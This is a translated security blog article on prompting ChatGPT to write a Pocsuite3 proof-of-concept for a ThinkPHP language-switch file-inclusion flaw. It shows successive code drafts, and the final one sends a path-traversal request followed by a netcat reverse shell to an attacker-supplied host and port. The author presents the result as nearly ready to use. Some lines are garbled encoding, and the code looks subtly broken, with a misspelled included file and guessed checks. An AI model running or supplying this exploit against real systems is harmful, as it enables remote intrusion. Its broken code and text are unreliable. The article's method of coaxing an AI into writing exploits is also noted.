Writing Pocsuite3 POCs Quickly with ChatGPT
Preface
This model can interact with people conversationally: it answers follow-up questions and chains of related questions, admits mistakes in its own answers, points out incorrect premises in a question, and refuses inappropriate requests.
Simply put, ChatGPT is an AI that analyses the questions we ask and answers them. It can be used to analyse code, or to write code according to our requirements, as shown below.
So I wondered whether it could write POCs for us and simplify part of the routine work, and that is how this article came about.
Analysis
Observations
I found that ChatGPT caches the result of the current query: when two consecutive questions are similar, ChatGPT evaluates how similar they are and, if the similarity is high enough, returns the result of the previous analysis. Its output for ambiguous statements also deviates quite a lot, so we can start with a simple statement and then refine it step by step so that the result matches our expectations more closely.
Process
Vulnerability background
At the start it is best to give CG (short for ChatGPT) the underlying principle of the vulnerability. If we describe it ourselves, though, the accuracy is fairly low, because natural language is ambiguous. Instead we can guide CG into learning the information related to the vulnerability. For example, the latest ThinkPHP vulnerability is a file inclusion caused by enabling multi-language mode. If we ask about it directly:
We find that CG cannot work it out for us, because lang_switch_on is actually a key in the array returned by config.php; strictly speaking it is not a parameter, which is why the interpretation goes wrong here. We know that config.php returns an array, but since CG never parses config.php, it has no idea what config.php returns.
But if we change our approach and ask instead:
We find that CG gives us a procedure. At this point CG has remembered this answer, so when we add this sentence to the vulnerability description, CG interprets it correctly.
Splitting into steps
When we ask it to write the program from one large block of text, you will find there are many errors, as shown below.
Based on my observation above, it occurred to me that we could first give a simple requirement and then keep building on the previous answers to improve the accuracy. As follows.
First, ask whether it knows pocsuite and request an example.
```python
import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class TestPOC(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'Test POC'
    appPowerLink = 'https://example.com'
    appName = 'Test'
    appVersion = '1.0'
    vulType = 'Test Vul'
    desc = '''Test POC Description'''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        # your code here
        result = {}
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        # your code here
        return output


# pocsuite3 imports this file as a module, so registration must run at import
# time rather than behind an `if __name__ == '__main__'` guard
register_poc(TestPOC)
```
Next, add a description of the vulnerability and ask it to improve the code.
```python
import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php
    file must be set to true, and a malicious lang parameter must be passed
    in the URL.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        result = {}
        # your code here
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        return output


# pocsuite3 imports this file as a module, so the POC is registered at import time
register_poc(ThinkPHP5_File_Inclusion)
```
At this point we add some more information.
```python
import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-12-09'
    createDate = '2022-12-09'
    updateDate = '2022-12-09'
    references = ['https://tttang.com/archive/1865/']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php
    file must be set to true, and a malicious lang parameter must be passed
    in the URL. This can allow an attacker to include the phearcmd.php file
    and execute arbitrary commands.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        result = {}
        # your code here
        # send a request with a malicious lang parameter
        url = self.url + '?lang=../phearcmd.php'
        r = req.get(url)
        # check if the phearcmd.php file was included
        if 'PhearCommand execution' in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('The vulnerability could not be verified')
        return output


# pocsuite3 imports this file as a module, so the POC is registered at import time
# (the rendered original showed `if name == 'main':`, which is not valid Python)
register_poc(ThinkPHP5_File_Inclusion)
```
最后,我們?cè)傺a(bǔ)充一點(diǎn)。
```python
import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-12-09'
    createDate = '2022-12-09'
    updateDate = '2022-12-09'
    references = ['https://tttang.com/archive/1865/']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php
    file must be set to true, and a malicious lang parameter must be passed
    in the URL. This can allow an attacker to include the phearcmd.php file
    and execute arbitrary commands, including a reverse shell.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        # send a request with a malicious lang parameter to include phearcmd.php
        url = self.url + '?lang=../phearcmd.php'
        r = req.get(url)
        # check if the phearcmd.php file was included
        if 'PhearCommand execution' in r.text:
            # send a request to execute a reverse shell command
            # (inner quotes escaped; the one-line original had unbalanced quotes)
            command = 'php -r "system(\'nc -e /bin/bash {0} {1}\');"'.format(
                self.options.get('lhost'), self.options.get('lport'))
            url = self.url + '?phearcmd=' + command
            req.get(url)

    def _verify(self):
        result = {}
        # your code here
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        # no output is necessary for this POC
        return output


# pocsuite3 imports this file as a module, so the POC is registered at import time
register_poc(ThinkPHP5_File_Inclusion)
```
到這里,基本上就可以拿來(lái)改改就能直接使用了。
Conclusion
From the use and analysis above we get a sense of how powerful CG is. When CG's answer to a question deviates a lot from what we want, we can work towards the solution step by step and let its engine keep correcting the result, so that the final result deviates only a little. The above is just a simple case; there are many more possibilities waiting to be explored.
Reviewing editor: 湯梓紅
Original title: 通過(guò)ChatGPT來(lái)快速編寫(xiě)Pocsuite3
Source: WeChat public account 菜鳥(niǎo)學(xué)信安 (WeChat ID: 菜鳥(niǎo)學(xué)信安). Please credit the source when reposting.